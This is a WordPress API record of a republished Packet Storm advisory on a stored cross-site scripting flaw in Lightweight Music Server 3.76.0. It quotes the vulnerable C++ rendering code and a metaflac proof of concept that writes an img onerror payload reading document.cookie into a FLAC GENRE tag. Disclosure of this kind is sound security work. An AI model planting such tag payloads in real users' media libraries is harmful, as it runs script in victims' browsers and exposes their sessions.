{"id":58955,"date":"2026-06-01T14:53:48","date_gmt":"2026-06-01T14:53:48","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=58955"},"modified":"2026-06-01T14:53:48","modified_gmt":"2026-06-01T14:53:48","slug":"lightweight-music-server-3760-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=58955","title":{"rendered":"\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419"},"content":{"rendered":"

{“lastseen”:”2026-06-01T19:06:36″,”description”:”Lightweight Music Server version 3.76.0 suffers from a persistent cross site scripting vulnerability. LMS stores media file metadata tags such as GENRE, ARTIST, and ALBUM exactly as written in the file and later renders them in its web interface…”,”published”:”2026-06-01T00:00:00″,”modified”:”2026-06-01T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:222419″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS\\n \\n \\n Vendor: Emeric Poupon\\n Product web page: https:\/\/github.com\/epoupon\/lms\\n Affected version 3.76.0\\n \\n Summary: LMS (Lightweight Music Server): A specific C++ based\\n project focused on a low memory footprint, featuring built-in\\n user management and a recommendation engine.\\n \\n Desc: LMS stores media file metadata tags (such as GENRE, ARTIST,\\n and ALBUM) exactly as written in the file and later renders them\\n in its web interface without HTML-encoding, resulting in stored\\n cross-site scripting. An attacker who gets a file with a malicious\\n tag into the victim’s library has their payload saved during the\\n next library scan and executed automatically whenever a user views\\n that track’s information or plays the file in the web UI.\\n \\n ————————————————————–\\n \/src\/lms\/ui\/Utils.cpp\\n ———————\\n 131: std::unique_ptr\\u003cWt::WInteractWidget\\u003e createFilter(const Wt::WString\\u0026 name, const Wt::WString\\u0026 tooltip, std::string_view colorStyleClass, bool canDelete)\\n 132: {\\n 133: auto res{ std::make_unique\\u003cWt::WText\\u003e(Wt::WString{ canDelete ? \\”\\u003ci class=\\\\\\”fa fa-times-circle\\\\\\”\\u003e\\u003c\/i\\u003e \\” : \\”\\” } + name, Wt::TextFormat::UnsafeXHTML) };\\n 134: res-\\u003esetStyleClass(\\”Lms-badge-cluster badge me-1 \\” + std::string{ colorStyleClass });\\n 135: res-\\u003esetInline(true);\\n 136: return res;\\n 137: }\\n ————————————————————–\\n \\n Tested on: GNU\/Linux (ARM64)\\n nginx\\n \\n \\n Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic\\n @zeroscience\\n \\n \\n Advisory ID: ZSL-2026-5987\\n Advisory URL: https:\/\/www.zeroscience.mk\/#\/advisories\/ZSL-2026-5987\\n \\n \\n 27.05.2026\\n \\n –\\n \\n \\n $ metaflac –set-tag=GENRE=\\”\\u003cimg src=1 onerror=alert(document.cookie)\\u003e\\” evil.flac\\n $ metaflac –list evil.flac\\n METADATA block #0\\n type: 0 (STREAMINFO)\\n is last: false\\n length: 34\\n minimum blocksize: 4608 samples\\n maximum blocksize: 4608 samples\\n minimum framesize: 2305 bytes\\n maximum framesize: 14124 bytes\\n sample_rate: 44100 Hz\\n channels: 2\\n bits-per-sample: 16\\n total samples: 4664587\\n MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d\\n METADATA block #1\\n type: 4 (VORBIS_COMMENT)\\n is last: false\\n length: 98\\n vendor string: Lavf57.83.100\\n comments: 2\\n comment[0]: encoder=Lavf57.83.100\\n comment[1]: GENRE=\\u003cimg src=1 onerror=alert(document.cookie)\\u003e\\n METADATA block #2\\n type: 1 (PADDING)\\n is last: true\\n length: 8140″,”sourceHref”:”https:\/\/packetstorm.news\/download\/222419″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222419\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-06-01T19:06:36″,”description”:”Lightweight Music Server version 3.76.0 suffers from a persistent cross site scripting vulnerability. LMS stores media file metadata tags such as GENRE, ARTIST, and ALBUM…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-58955","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=58955\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-06-01T19:06:36″,”description”:”Lightweight Music Server version 3.76.0 suffers from a persistent cross site scripting vulnerability. LMS stores media file metadata tags such as GENRE, ARTIST, and ALBUM...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=58955\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-01T14:53:48+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58955#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58955\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419\",\"datePublished\":\"2026-06-01T14:53:48+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58955\"},\"wordCount\":532,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=58955#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58955\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58955\",\"name\":\"\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-01T14:53:48+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58955#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=58955\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=58955#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=58955","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419 - zero redgem","og_description":"{“lastseen”:”2026-06-01T19:06:36″,”description”:”Lightweight Music Server version 3.76.0 suffers from a persistent cross site scripting vulnerability. LMS stores media file metadata tags such as GENRE, ARTIST, and ALBUM...","og_url":"https:\/\/zero.redgem.net\/?p=58955","og_site_name":"zero redgem","article_published_time":"2026-06-01T14:53:48+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=58955#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=58955"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419","datePublished":"2026-06-01T14:53:48+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=58955"},"wordCount":532,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=58955#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=58955","url":"https:\/\/zero.redgem.net\/?p=58955","name":"\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-01T14:53:48+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=58955#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=58955"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=58955#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Lightweight Music Server 3.76.0 Cross Site Scripting_PACKETSTORM:222419"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/58955","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=58955"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/58955\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=58955"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=58955"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=58955"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}